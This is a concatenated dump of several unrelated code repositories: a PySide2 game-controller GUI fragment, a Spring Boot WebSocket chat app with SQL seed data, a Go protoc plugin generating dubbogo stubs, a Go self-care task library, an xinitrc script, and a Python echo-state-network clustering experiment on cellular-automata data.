ui.show()
app.exec_()
print(A)<file_sep># Fish_Game_Control
Real-time fish game controller
<file_sep>from PySide2.QtWidgets import QApplication, QMainWindow, QPushButton, QPlainTextEdit,QMessageBox
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import QFile
class Stats():
def __init__(self):
self.ui = QUiLoader().load('UI/fish_controller.ui')
self.ui.run.clicked.connect(self.run_game)
self.ui.save.clicked.connect(self.save)
def run_game(self):
print("程序开始")
def save(self):
time1 = self.ui.time1.text()
if time1 =="":
QMessageBox.about(self.ui,"提示","请输入触发时间")
key1 = self.ui.key1.text()
if key1 =="":
QMessageBox.about(self.ui,"提示","请输入触发时间")
time2 = self.ui.time2.text()
key2 = self.ui.key2.text()
ipAddr = self.ui.ipAddr.text()
port = self.ui.ipAddr.text()
print(type(time1),key1,time2,key2,ipAddr,port)
app = QApplication([])
stats = Stats()
stats.ui.show()
app.exec_() | eabbe19dcafda2837f59882a2dd2b97c5acf92a4 | [
"Markdown",
"Python"
] | 3 | Python | ArtistVan1/Fish_Game_Control | 6975e213d2a0bef4f04b89501951f01d6e51fc56 | 4c44d527f3298ab5d4f1356314fb9ab16568c5a1 |
refs/heads/master | <file_sep>package com.example.demochat.service;
import com.example.demochat.domain.Message;
import java.util.List;
public interface MessageService {
public Message addMessage(Message message);
public List<Message> getMessagesByChannelId(Long channelId);
}
<file_sep>package com.example.demochat.service.impl;
import com.example.demochat.domain.ChannelUser;
import com.example.demochat.repository.ChannelUserRepository;
import com.example.demochat.service.ChannelUserService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class ChannelUserServiceImpl implements ChannelUserService {
@Autowired
ChannelUserRepository channelUserRepository;
@Override
public void addChannelUser(ChannelUser channelUser) {
channelUserRepository.save(channelUser);
}
@Override
public ChannelUser getChannelUser(Long channelId, Long userId) {
return channelUserRepository.findChannelUserByChannelIdAndUserId(channelId, userId);
}
@Override
public List<ChannelUser> getChannelUsersByUserId(Long userId) {
return channelUserRepository.findAllByUserId(userId);
}
}
<file_sep>insert into user (id, email, password, nickname, regdate) VALUES (1, 'test', '{bcrypt}$2a$10$qS48/8nM2fSagy1di.whF.tutE/VZ9/wwOkGBcm.Ty8mOKLfwpv/G', '아이스베어', now());
insert into user (id, email, password, nickname, regdate) VALUES (2, 'test2', '{bcrypt}$2a$10$qS48/8nM2fSagy1di.whF.tutE/VZ9/wwOkGBcm.Ty8mOKLfwpv/G', '갈색곰', now());
insert into user (id, email, password, nickname, regdate) VALUES (3, 'test3', '{bcrypt}$2a$10$qS48/8nM2fSagy1di.whF.tutE/VZ9/wwOkGBcm.Ty8mOKLfwpv/G', '판다', now());
insert into user_roles(id, role_name, user_id) VALUES (1, 'USER', 1);
insert into user_roles(id, role_name, user_id) VALUES (2, 'ADMIN', 1);
insert into user_roles(id, role_name, user_id) VALUES (3, 'USER', 2);
insert into user_roles(id, role_name, user_id) VALUES (4, 'ADMIN', 2);
insert into user_roles(id, role_name, user_id) VALUES (5, 'USER', 3);
insert into channel (id, name, regdate) VALUES (1, 'room number 1', now());
insert into channel (id, name, regdate) VALUES (2, 'room number 2', now());
insert into channel (id, name, regdate) VALUES (3, 'room number 3', now());
insert into channel (id, name, regdate) VALUES (4, 'room number 4', now());
insert into channel_user (id, user_id, channel_id) VALUES (1, 1, 1);
insert into channel_user (id, user_id, channel_id) VALUES (2, 1, 2);
insert into channel_user (id, user_id, channel_id) VALUES (3, 1, 3);
insert into channel_user (id, user_id, channel_id) VALUES (4, 1, 4);
insert into channel_user (id, user_id, channel_id) VALUES (5, 2, 1);
insert into channel_user (id, user_id, channel_id) VALUES (6, 2, 2);
insert into channel_user (id, user_id, channel_id) VALUES (7, 3, 3);
insert into channel_user (id, user_id, channel_id) VALUES (8, 3, 4);<file_sep>package com.example.demochat.service;
import com.example.demochat.domain.User;
public interface UserService {
public void addUser(User user);
public User getUserByEmail(String email);
}
<file_sep>package com.example.demochat.config;
import com.example.demochat.interceptor.HttpSessionIdHandshakeInterceptor;
import com.example.demochat.websocket.RawWebSocketHandler;
import com.example.demochat.websocket.CustomWebSocketHandler;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.socket.config.annotation.*;
@Configuration
@EnableWebSocket
public class WebSocketConfig implements WebSocketConfigurer {
@Autowired
private CustomWebSocketHandler customWebSocketHandler;
@Override
public void registerWebSocketHandlers(WebSocketHandlerRegistry registry) {
registry.addHandler(new RawWebSocketHandler(), "/raw");
registry.addHandler(customWebSocketHandler, "/sock").withSockJS().setInterceptors(new HttpSessionIdHandshakeInterceptor());
}
}
<file_sep>package com.example.demochat.repository;
import com.example.demochat.domain.ChannelUser;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.data.repository.query.Param;
import java.util.List;
public interface ChannelUserRepository extends JpaRepository<ChannelUser, Long> {
ChannelUser findChannelUserByChannelIdAndUserId(Long channelId, Long userId);
@Query("select c from ChannelUser c where c.user.id = :userId")
List<ChannelUser> findAllByUserId(@Param("userId") Long userId);
}
<file_sep>package com.example.demochat.service.impl;
import com.example.demochat.domain.Message;
import com.example.demochat.repository.MessageRepository;
import com.example.demochat.service.MessageService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class MessageServiceImpl implements MessageService {
@Autowired
MessageRepository messageRepository;
@Override
public Message addMessage(Message message) {
return messageRepository.save(message);
}
@Override
public List<Message> getMessagesByChannelId(Long channelId) {
return messageRepository.findAllByChannelId(channelId);
}
}
<file_sep>var sock = null;
$(document).ready(function () {
sock = new SockJS('/sock');
sock.onopen = function () {
console.log("connected");
};
sock.onmessage = function (e) {
var data = JSON.parse(e.data);
var channelId = data.channelId;
if($("#"+channelId).css('display') != 'none'){
showMessage(data);
}
};
sock.onclose = function () {
console.log('disconnected');
};
$("#chatInput_1").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(1);
}
});
$("#chatInput_2").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(2);
}
});
$("#chatInput_3").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(3);
}
});
$("#chatInput_4").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(4);
}
});
});
function enter(channelId) {
// if(!$("#"+channelId).css('display') == 'none'){
$.ajax({
url: '/api/channels/'+channelId,
method: 'get',
dataType: "json",
contentType: "application/json",
success: function (data) {
if(data != null){
for(var i=0;i<data.length;i++){
showMessage(data[i]);
}
}
}
});
// $("#"+channelId).show();
// }
}
function sendMsg(channelId) {
sock.send(JSON.stringify({'channelId' : channelId, 'text' : $("#chatInput_"+channelId).val()}));
/*var JSONObject= {
"channelId" : channelId,
"text" : $("#chatInput_"+channelId).val()
};
var jsonData = JSON.stringify( JSONObject );
$.ajax({
url: '/api/channels/'+channelId+'/messages',
method: 'post',
data: jsonData,
dataType: "json",
contentType: "application/json",
success: function (data) {
// showMessage(data);
}
});*/
$("#chatInput_"+channelId).val("");
}
function disconnect() {
sock.close();
}
function showMessage(data) {
$('#messages_'+data.channelId).append("[" + data.nickname + "] " + data.text + '\n');
var textArea = $('#messages_'+data.channelId);
textArea.scrollTop( textArea[0].scrollHeight - textArea.height() );
}
function getFormData($form){
var unindexed_array = $form.serializeArray();
var indexed_array = {};
$.map(unindexed_array, function(n, i){
indexed_array[n['name']] = n['value'];
});
return indexed_array;
}
function createChannel() {
var $form = $("#creatForm");
var data = getFormData($form)
var jsonData = JSON.stringify(data);
$.ajax({
url: '/api/channels',
method: 'post',
data: jsonData,
dataType: "json",
contentType: "application/json",
success: function (data) {
freshChannelList(data);
$('.pop-layer').hide();
$('#name').val("");
$('#purpose').val("");
$('#invite').val("");
}
});
}
function freshChannelList(data) {
$("#channelList").empty();
alert("mmmm");
for(var key in data){
// var $div = $('<div></div>').appendTo($("#channelList"));
// $('<a></a>').attr('onclick', 'enter(1)').attr('value', data[key].name)
// .addClass('btn btn-light btn-block').appendTo($div);
// $('<a></a>').attr('onclick', 'enter(1)').attr('value', data[key].name)
// .appendTo($div);
$("#channelList").innerHTML = data[key].name;
}
} | b39d78d08b8a0de336c6045b2e9ed849f684794d | [
"JavaScript",
"Java",
"SQL"
] | 8 | Java | SehwaKim/demochat | 3c4c90dc647b76876d46c6432a9738b157fd5adb | 0905fc14fed2bff03918655a93672ce38223836b |
refs/heads/master | <file_sep>package dubbo
type ServiceStub struct {
ClientStubName string
ServiceName string
ServerStubName string
SeverStubMethods string
UnimplementedServerName string
ClientMethods []string
ServerMethods []string
UnimplementedStubMethods []string
ServerProxyMethods []string
}
<file_sep>#### 简介
- 只是一款protocol buffer编译的插件,作用类似protobuf的grpc插件,用于生成dubbogo的go stub
#### 准备
- 首先要有protoc编译工具, 具体安装方法google一下就可以了
```shell script
go get -u github.com/skyitachi/protoc-gen-dubbogo
```
#### 使用指南
```shell script
cd example
# 如果protoc-gen-dubbgo在PATH里面的话
protoc --dubbogo_out=plugins=dubbogo:. user/user.proto
# 指定plugins path
protoc --plugin={plugin_path} --dubbogo_out=plugins=dubbogo:. user/user.proto
```
ps: 除了plugin的名称不一样以外,其他使用方式和grpc的plugin是一样的<file_sep>package dubbo
import (
"bytes"
"fmt"
pb "github.com/golang/protobuf/protoc-gen-go/descriptor"
"github.com/golang/protobuf/protoc-gen-go/generator"
"log"
"text/template"
)
const (
contextPkgPath = "context"
dubbogoPkgPath = "github.com/apache/dubbo-go"
errorPkgPath = "github.com/pkg/errors"
configPkgPath = "github.com/apache/dubbo-go/config"
)
var (
contextPkg string
)
var reservedClientName = map[string]bool{
// TODO: do we need any in gRPC?
}
type dubbogo struct {
gen *generator.Generator
}
func init() {
//fmt.Println("in the dubbogo plugin inited")
//var cc *grpc.ClientConn
//cc.Invoke()
generator.RegisterPlugin(new(dubbogo))
}
func (d *dubbogo) P(args ...interface{}) { d.gen.P(args...) }
func (d dubbogo) Name() string {
return "dubbogo"
}
func (d *dubbogo) Init(g *generator.Generator) {
d.gen = g
}
// Also record that we're using it, to guarantee the associated import.
func (d *dubbogo) objectNamed(name string) generator.Object {
d.gen.RecordTypeUse(name)
return d.gen.ObjectNamed(name)
}
// Given a type name defined in a .proto, return its name as we will print it.
func (d *dubbogo) typeName(str string) string {
return d.gen.TypeName(d.objectNamed(str))
}
func (d *dubbogo) GenerateImports(file *generator.FileDescriptor) {
//fmt.Println("not implement")
}
func (d *dubbogo) Generate(file *generator.FileDescriptor) {
if len(file.FileDescriptorProto.Service) == 0 {
return
}
contextPkg = string(d.gen.AddImport(contextPkgPath))
d.gen.AddImport(errorPkgPath)
d.gen.AddImport(configPkgPath)
d.P("// Reference imports to suppress errors if they are not otherwise used.")
d.P("var _ ", contextPkg, ".Context")
d.P()
// Assert version compatibility.
d.P("// This is a compile-time assertion to ensure that this generated file")
d.P("// is compatible with the grpc package it is being compiled against.")
d.P()
for i, service := range file.FileDescriptorProto.Service {
//d.generateService(file, service, i)
d.generateService(file, service, i)
}
}
var deprecationComment = "// Deprecated: Do not use."
func (d *dubbogo) generateService(file *generator.FileDescriptor, service *pb.ServiceDescriptorProto, index int) {
tplStr := GetServiceTpl()
tpl, err := template.New(service.GetName()).Parse(tplStr)
if err != nil {
log.Fatal(err)
}
serviceStub := ServiceStub{
ServiceName: service.GetName(),
ClientStubName: service.GetName(),
ServerStubName: service.GetName() + "Server",
UnimplementedServerName: "Unimplemented" + service.GetName() + "Server",
}
buffer := bytes.NewBuffer([]byte{})
origServName := service.GetName()
fullServName := origServName
if pkg := file.GetPackage(); pkg != "" {
fullServName = pkg + "." + fullServName
}
servName := generator.CamelCase(origServName)
//deprecated := service.GetOptions().GetDeprecated()
clientMethods := make([]string, 0)
serverMethods := make([]string, 0)
serverStubMethods := make([]string, 0)
unimplementedStubMethods := make([]string, 0)
stubName := serviceStub.ServerStubName + "Stub"
for _, method := range service.Method {
client, server := d.generateClientSignature(servName, method)
unimplemented := d.generateUnimplementedServerService(server, serviceStub.UnimplementedServerName)
clientMethods = append(clientMethods, client)
serverMethods = append(serverMethods, server)
unimplementedStubMethods = append(unimplementedStubMethods, unimplemented)
methodName := method.GetName()
returnType := d.typeName(method.GetOutputType())
reqType := d.typeName(method.GetInputType())
stubMethod := d.generateServerStubMethod(stubName, methodName, contextPkg, returnType, reqType)
serverStubMethods = append(serverStubMethods, stubMethod)
}
serverMethods = append(serverMethods, "Reference() string")
serviceStub.ClientMethods = clientMethods
serviceStub.ServerMethods = serverMethods
serviceStub.UnimplementedStubMethods = unimplementedStubMethods
serviceStub.ServerProxyMethods = serverStubMethods
if err := tpl.Execute(buffer, serviceStub); err != nil {
log.Fatal(err)
}
d.P(string(buffer.Bytes()))
}
func (d *dubbogo) generateClientSignature(servName string, method *pb.MethodDescriptorProto) (string, string) {
origMethName := method.GetName()
methName := generator.CamelCase(origMethName)
if reservedClientName[methName] {
methName += "_"
}
reqArg := ", in *" + d.typeName(method.GetInputType())
if method.GetClientStreaming() {
reqArg = ""
}
respName := "out *" + d.typeName(method.GetOutputType())
serverRespName := " *" + d.typeName(method.GetOutputType())
if method.GetServerStreaming() || method.GetClientStreaming() {
respName = servName + "_" + generator.CamelCase(origMethName) + "Client"
}
client := fmt.Sprintf("%s func (ctx %s.Context%s, %s) error", methName, contextPkg, reqArg, respName)
server := fmt.Sprintf("%s(ctx %s.Context%s) (%s, error)", methName, contextPkg, reqArg, serverRespName)
return client , server
}
func (d *dubbogo) generateUnimplementedServerService(methodSignature string, stubName string) string {
return fmt.Sprintf("func (*%s) %s{\nreturn nil, errors.New(\"not implemented\")\n}", stubName, methodSignature)
}
func (d *dubbogo) generateServerStubMethod(stubName string, methodName string, ctxPkg string, returnType string, req string) string {
tpl := GetStubMethodTpl()
return fmt.Sprintf(tpl, stubName, methodName, ctxPkg, returnType, req, methodName)
}
<file_sep>package dubbo
func GetServiceTpl() string {
return `
type {{.ClientStubName}} struct {
{{range .ClientMethods}}
{{println .}}
{{end}}
}
func ({{.ClientStubName}}) Reference() string {
return "{{.ServiceName}}"
}
func New{{.ClientStubName}}() *{{.ClientStubName}} {
client := new({{.ClientStubName}})
config.SetConsumerService(client)
return client
}
type {{.ServerStubName}} interface {
{{range .ServerMethods}}
{{println .}}
{{end}}
}
type Unimplemented{{.ServerStubName}} struct {
}
{{range .UnimplementedStubMethods }}
{{println .}}
{{end}}
func (*Unimplemented{{.ServerStubName}}) Reference() string {
return "{{.ServiceName}}"
}
type {{.ServerStubName}}Stub struct {
stub {{.ServerStubName}}
}
{{range .ServerProxyMethods}}
{{println .}}
{{end}}
func (*{{.ServerStubName}}Stub) Reference() string {
return "{{.ServiceName}}"
}
func new{{.ServerStubName}}Stub(service {{.ServerStubName}}) (*{{.ServerStubName}}Stub) {
return &{{.ServerStubName}}Stub{stub: service}
}
func RegisterProvider(service {{.ServerStubName}}) {
stub := new{{.ServerStubName}}Stub(service)
config.SetProviderService(stub)
}
`
}
func GetStubMethodTpl() string {
return `func (s *%s) %s(ctx %s.Context, data []byte) (*%s, error) {
req := &%s{}
buf := proto.Buffer{}
buf.SetBuf(data)
if err := buf.Unmarshal(req); err != nil {
return nil, err
}
return s.stub.%s(ctx, req)
}`
} | 4adb6c258f9f4123c1ef74281fa7b7f7d67e5601 | [
"Markdown",
"Go"
] | 4 | Go | skyitachi/protoc-gen-dubbogo | da99749a4de3ebb84229a328e84481cc9c8fac1f | 87a5427887bd8cbe539615a89c63f986789edaf8 |
refs/heads/master | <file_sep>#!/bin/sh
#
# ~/.xinitrc
#
# Executed by startx (run your window manager from here)
# exec gnome-session
# exec startkde
# exec startxfce4
# ...or the Window Manager of your choice
setxkbmap no
#tint2 &
# exec wmii
#exec openbox-session
#exec dbus-launch --exit-with-session ck-launch-session openbox-session
#
xsetroot -cursor_name left_ptr
feh --bg-center ~/Pictures/Wallpapers/crows-1280x960.jpg &
urxvtd -q -f -o &
exec dbus-launch --exit-with-session ck-launch-session xmonad
| 6eed844a750b3e5e3093c342299f174f2ae70324 | [
"Shell"
] | 1 | Shell | abstrakct/old-dotfiles | 209dc6348df67e874b45da78a9b9d5b3268c3ef0 | a2963453020c6027d5161d995133f4a0d2a966a3 |
refs/heads/master | <repo_name>ninedraft/selfcare<file_sep>/pkg/tasks/utils.go
package tasks
import (
"math/rand"
"time"
)
var rnd *rand.Rand
func init() {
rnd = newRnd()
}
func newRnd() *rand.Rand {
var seed = time.Now().UnixNano()
var source = rand.NewSource(seed)
return rand.New(source)
}
func DefaultLabels() []string {
return []string{
"💚", "❤", "♥", "🧡", "💜", "💛", "💙", "💗",
"💖", "✨", "✔", "🥇", "🍫", "🧁",
"🍬", "🌼", "🌻", "🌞", "☀",
}
}
<file_sep>/pkg/tasks/tasks.go
package tasks
import (
"bufio"
"encoding/json"
"fmt"
"io"
"math/rand"
"strings"
)
type Tasks struct {
rnd *rand.Rand
tasks []Task
}
func NewTasks() *Tasks {
return &Tasks{
rnd: newRnd(),
tasks: []Task{},
}
}
func ParseTasks(re io.Reader) (*Tasks, error) {
var taskSet = make(map[string][]string)
var scanner = bufio.NewScanner(re)
for scanner.Scan() {
var line = scanner.Text()
var tokens = strings.SplitN(line, ":", 2)
switch len(tokens) {
case 1:
var taskText = strings.TrimSpace(tokens[0])
taskSet[taskText] = DefaultLabels()
case 2:
var label = strings.TrimSpace(tokens[0])
var taskText = strings.TrimSpace(tokens[1])
taskSet[taskText] = append(taskSet[taskText], label)
default:
continue
}
}
if scanner.Err() != nil {
return nil, scanner.Err()
}
var taskList = make([]Task, 0, len(taskSet))
for text, labels := range taskSet {
taskList = append(taskList, Task{
Text: text,
Labels: labels,
})
}
var tasks = NewTasks()
tasks.tasks = taskList
return tasks, nil
}
func (tasks *Tasks) String() string {
return fmt.Sprintf("Tasks{%d self care tasks}", len(tasks.tasks))
}
func (tasks *Tasks) NTasks() int {
return len(tasks.tasks)
}
func (tasks *Tasks) TaskList() []Task {
var list = make([]Task, 0, tasks.NTasks())
for _, task := range tasks.tasks {
list = append(list, task.Clone())
}
return list
}
func (tasks *Tasks) PeekN(n int) []Task {
var nTasks = len(tasks.tasks)
if n < 0 || n > nTasks {
n = nTasks
}
var sample = make([]Task, 0, nTasks)
for _, i := range tasks.rnd.Perm(nTasks)[:n] {
sample = append(sample, tasks.tasks[i])
}
return sample
}
func (tasks *Tasks) PeekNasStrings(n int) []string {
var sample = make([]string, 0, len(tasks.tasks))
for _, task := range tasks.PeekN(n) {
sample = append(sample, task.AsString(tasks.rnd))
}
return sample
}
var (
_ json.Marshaler = new(Tasks)
_ json.Unmarshaler = new(Tasks)
)
func (tasks *Tasks) MarshalJSON() ([]byte, error) {
return json.Marshal(tasks.tasks)
}
func (tasks *Tasks) UnmarshalJSON(data []byte) error {
var taskList []Task
if err := json.Unmarshal(data, &taskList); err != nil {
return err
}
tasks.tasks = taskList
if tasks.rnd == nil {
tasks.rnd = newRnd()
}
return nil
}
<file_sep>/go.mod
module github.com/ninedraft/selfcare
go 1.12
<file_sep>/pkg/tasks/task.go
package tasks
import (
"fmt"
"math/rand"
)
type Task struct {
Labels []string `json:"labels"`
Text string `json:"text"`
}
func (task Task) String() string {
return task.AsString(rnd)
}
func (task Task) AsString(rnd *rand.Rand) string {
var labels = task.Labels
if len(labels) == 0 {
labels = DefaultLabels()
}
var label = labels[rnd.Intn(len(labels))]
return fmt.Sprintf("%s: %s", label, task.Text)
}
func (task Task) Clone() Task {
return Task{
Labels: append([]string{}, task.Labels...),
Text: task.Text,
}
}
| 7e4f6e5c13ac1d47e16175154fb667509c37e2d8 | [
"Go Module",
"Go"
] | 4 | Go | ninedraft/selfcare | 0cff493c58f67f8cf820e6d00cd04aa7c54414c4 | 477aed704947e504c6a7ba9221c1039b4c70d6d7 |
refs/heads/master | <repo_name>JeanCarloMacan/TFM<file_sep>/Main_Pruebas.py
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
from TensorflowEchoStateNetwork.esn_ip_cell import ESNIPCell
import os
import pandas as pd
from functions import *
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_samples, silhouette_score
#from sklearn.cluster import DBSCAN
#from sklearn import metrics
# Hyperparameters
#units = 10                      # reservoir size; swept via `unidades` in the grid search below
washout_size = 0                 # number of initial reservoir states discarded before readout
scale = 1
#connectivity = 0.3              # reservoir connectivity; swept via `conexiones` below
N = 3  # Number of labels / classes
time_steps = 100                 # length (in ticks) of each signal slice fed to the network
max_length = 60000               # rows read from each rule's CSV file
initial_crop = 2000              # initial transient ticks cropped from every signal
#maxSamples = int(((max_length - initial_crop)/2)/time_steps)  # divided by 2 because half the slices go to train and half to test
maxSamples = 250                 # slices (signal portions) extracted per rule
increment = 10                   # stride (in ticks) between overlapped IP-training slices
channels = 1  # number of channels/sensors/measurements of the time series stored in the .csv (# of columns)
maxTrainingSamples = maxSamples  # max number of slices used for the IP optimisation
# IP (intrinsic plasticity) parameters
mean = 0.
#std = 0.6                       # IP target std; swept via `desviaciones` below
learning_rate = 0.001
# Label each slice with its class id: maxSamples copies of 0, then of 1, ... up to N-1.
# Built dynamically from N so it grows with the number of classes (resolves the old
# hard-coded 3-class construction). dtype float kept for backward compatibility with
# the original np.zeros/np.ones based array.
tag = np.repeat(np.arange(N, dtype=float), maxSamples)
# Parameters for the silhouette analysis
range_n_clusters = [3, 4, 5, 6, 7]
# 0,40,96,235,249,255,57,76,77,132,187,205,26,41,94,133,154,166,
# Data loading: build the IP-optimisation stream (train) and the reservoir test set.
#rules=[96, 77, 83, 133, 124, 86]
rules=[23,33,51,83,123,178,
       124,54,147,110,137,193,18,22,86,105,122,150] # CA rule numbers to use, 6 per class
filename='rule_'
filepath='/home/jean/Dropbox/JeanCarlo_GIDTEC y Varios_Respaldos_Personal/TFM/Datos CA/'
savePath='/home/jean/Dropbox/JeanCarlo_GIDTEC y Varios_Respaldos_Personal/TFM/Experiments/'
cluster = []        # per-rule full signals, transposed to (channels, ticks)
testData = []       # per-rule non-overlapped slices for the reservoir
trainIPdata = []    # concatenated overlapped slices for IP optimisation
for rule in rules:
    # Skip the CSV preamble (first 20 rows) and read at most `max_length` rows.
    df = pd.read_csv(filepath + filename + str(rule) + '_plots_single.csv', header=None, skiprows=20, nrows=max_length)
    values = df.values  # raw ndarray out of the dataframe
    # Drop the initial transient and keep the first `channels` data columns
    # (column 0 holds the tick index, hence the +1 offset).
    signals = np.float32(values[initial_crop:max_length, 1:channels+1])
    # Overlapped slices of shape (maxTrainingSamples, time_steps, channels).
    trainSamples = get_more_overlaped_samples(signals, time_steps, increment, maxTrainingSamples)
    # Flatten the slices into one long stream (as if laid end to end).
    # reshape(-1, channels) instead of the old hard-coded maxSamples*time_steps:
    # the sampler above was called with maxTrainingSamples, so hard-coding
    # maxSamples would break if the two constants ever diverged.
    trainIPdata.extend(trainSamples.reshape(-1, channels))
    # Non-overlapped slices for the reservoir test set.
    testSamples = split_in_subsamples(signals, time_steps, maxSamples)
    testData.append(testSamples)
    cluster.append(np.transpose(np.float32(signals)))
# Final shape (len(rules)*maxSamples, time_steps, channels), "normalised" by the
# 257 possible CA states. E.g. with maxSamples=40 and 3 rules the batch dim is 120.
testData = np.array(testData).reshape([len(rules)*maxSamples,time_steps,channels])/257
trainIPdata = np.array(trainIPdata)/257  # normalise the IP-optimisation stream too
print('Datos_cargados')
#plt.plot(trainIPdata)
#plt.ylabel('some numbers')
#plt.show()
# Grid Search para el tamano del Reservorio
#unidades=np.arange(2,102,2) # De 2 en 2 hasta llegar a 100
unidades = [6]
desviaciones = [1.0]
conexiones = [1.0]
# --- Grid search over reservoir size / IP target std / connectivity.
# Each configuration is repeated 10 rounds; per-round metrics are collected
# in the accumulator lists below and summarised after the rounds finish.
for units in unidades:
    for std in desviaciones:
        for connectivity in conexiones:
            # Per-configuration accumulators (one entry per repetition round).
            evolutionSR_NoIP = []
            evolutionSR_WithIP = []
            noIP_2clusters_count = []
            noIP_3clusters_count = []
            noIP_4clusters_count = []
            noIP_5clusters_count = []
            noIP_6clusters_count = []
            noIP_7clusters_count = []
            noIP_8clusters_count = []
            withIP_2clusters_count = []
            withIP_3clusters_count = []
            withIP_4clusters_count = []
            withIP_5clusters_count = []
            withIP_6clusters_count = []
            withIP_7clusters_count = []
            withIP_8clusters_count = []
            Silouethe_scores_means_IP=[]
            Silouethe_scores_means_noIP=[]
            noIP_samples_4clusters_count = []
            noIP_samples_6clusters_count = []
            withIP_samples_4clusters_count = []
            withIP_samples_6clusters_count = []
            for z in range(10): # Numero de repeticiones
                print('Estamos con '+ str(units)+' unidades')
                print('Ronda: ' + str(z))
                experimentName = str(units) + '_' + str(std) + '_'+str(connectivity)
                tf.reset_default_graph() # Para limpiar todo el grafo en cada iteracion
                with tf.Session() as S:
                    # --- Run the reservoir WITHOUT intrinsic-plasticity (IP)
                    # optimisation and save activation histograms per neuron. ---
                    # Ejecucion sin optimizar IP
                    print("Building graph...")
                    # Instancia clase ESN
                    data_t = tf.constant(testData, dtype=tf.float32) # testData son nuestros datos a utilizar. Debe ir aqui!!, no antes
                    esn = ESNIPCell(units, scale, connectivity, mean=mean, std=std, learning_rate=learning_rate, input_size=trainIPdata.shape[1])
                    outputs, final_state = tf.nn.dynamic_rnn(esn, data_t, dtype=tf.float32)
                    washed = tf.squeeze(tf.slice(outputs, [0, washout_size, 0], [-1, -1, -1]))
                    S.run(tf.global_variables_initializer())
                    print("Computing embeddings...")
                    res = S.run(washed)
                    var= [v for v in tf.global_variables() if v.name == 'rnn/ESNIPCell/GainVector:0'] # Ver el contenido de las variables
                    print(S.run(var))
                    # Histogramas para ver la estructura de los datos (las distribuciones)
                    if units>=10:
                        aux=10 # Lo dejamos clavado en 10 para unicamente ver las distribuciones de las 10 primeras neuronas. Esto para resevorios con mas de 10 unidades
                    if units<10:
                        aux=units
                    f, a = plt.subplots(aux, 1,figsize=(12, 22))
                    plt.subplots_adjust(bottom=.08, top=.92, left=.1, right=.95, hspace=0.8, wspace=0.35)
                    a = a.ravel()
                    for idx, ax in enumerate(a):
                        ax.hist(res[:,-1,idx],200,range=(-1, 1))
                        ax.set_title('Neurona del Reservorio: '+str(idx))
                        #ax.set_xlabel('Intervalo [-1,1]')
                        #ax.set_ylabel('Y')
                    #plt.tight_layout()
                    #f.suptitle('Distribuciones sin Plasticidad Intrínseca', fontsize=30) # Creo q es mejor poner en el titulo de la imagen en el latex
                    #plt.show()
                    if not os.path.exists(savePath+experimentName):
                        os.makedirs(savePath+experimentName)
                    f.savefig(savePath+experimentName+'/fig_No_IP'+'_round_'+str(z)+'.pdf')
                    plt.close('all')
                    # --- Pairwise neuron-activation cluster analysis (no IP):
                    # for every pair of reservoir neurons, pick the cluster
                    # count with the best silhouette score and plot it. ---
                    noIP_Silhouette_BestScores = []
                    noIP_bestScores_clusters = []
                    noIP_pairs = []
                    noIP_3clusters_scores = []
                    noIP_Silhouette_score=[]
                    noIP_samples_count = []
                    noIP_4clusters_samples_count= []
                    noIP_6clusters_samples_count = []
                    # Graficos de pares de neuronas
                    aux_pares=0
                    for i in range(units-1):
                        for j in range(i+1,units):
                            print('Par de neuronas: '+ str(i)+'_'+str(j))
                            aux_pares += 1
                            #plt.figure()
                            #fig, ax = plt.subplots(1, 1, figsize=(6, 6))
                            # define the data
                            x = res[:,-1, i]
                            y = res[:,-1, j]
                            points = np.transpose(np.vstack((x, y)))
                            # Obtencion del numero estimado de clusters
                            scores=[]
                            for n_clusters in range_n_clusters:
                                # Initialize the clusterer with n_clusters value and a random generator
                                # seed of 10 for reproducibility.
                                clusterer = KMeans(n_clusters=n_clusters, random_state=10)
                                cluster_labels = clusterer.fit_predict(points)
                                # The silhouette_score gives the average value for all the samples.
                                # This gives a perspective into the density and separation of the formed
                                # clusters
                                silhouette_avg = silhouette_score(points, cluster_labels)
                                scores.append([n_clusters, silhouette_avg])
                            max_indx=np.argmax(scores,axis=0)#Obtenemos los indices del mayor silhouette score
                            bestScore=scores[max_indx[1]] # obtenemos el par [n_clusters,best_score]
                            n_clusters=bestScore[0] # El nuevo n_clusters # Aqui vendria la condicion if n_clusters == 3, plotearse
                            noIP_Silhouette_BestScores.append(bestScore[1])
                            noIP_bestScores_clusters.append(bestScore[0])
                            noIP_pairs.append('Par_' + str(i) + '_' + str(j))
                            if n_clusters == 3: #or n_clusters == 4:
                                noIP_Silhouette_score.append(bestScore[1])
                                noIP_3clusters_scores.append(['Par_' + str(i) + '_' + str(j),bestScore,n_clusters])
                            # Create a subplot with 1 row and 2 columns
                            fig, (ax1, ax2) = plt.subplots(1, 2)
                            fig.set_size_inches(18, 7)
                            # The 1st subplot is the silhouette plot
                            # The silhouette coefficient can range from -1, 1 but in this example all
                            # lie within [-0.1, 1]
                            ax1.set_xlim([-0.1, 1])
                            # The (n_clusters+1)*10 is for inserting blank space between silhouette
                            # plots of individual clusters, to demarcate them clearly.
                            ax1.set_ylim([0, len(points) + (n_clusters + 1) * 10])
                            # Volvemos a hacer la clusterizacion
                            clusterer = KMeans(n_clusters=n_clusters, random_state=10)
                            cluster_labels = clusterer.fit_predict(points)
                            silhouette_avg = silhouette_score(points, cluster_labels)
                            # Contamos la cantidad de muestras por clase (o cluster)
                            unique_elements, counts_elements = np.unique(np.array(cluster_labels),
                                                                         return_counts=True)
                            noIP_samples_count.append([unique_elements, counts_elements,'Par_' + str(i) + '_' + str(j)])
                            if max(unique_elements) == 5: #Esto para cuando clusteriza 6 grupos
                                noIP_6clusters_samples_count.append(np.sort(counts_elements))
                            if max(unique_elements) == 3: #Esto para cuando clusteriza 4 grupos
                                noIP_4clusters_samples_count.append(np.sort(counts_elements))
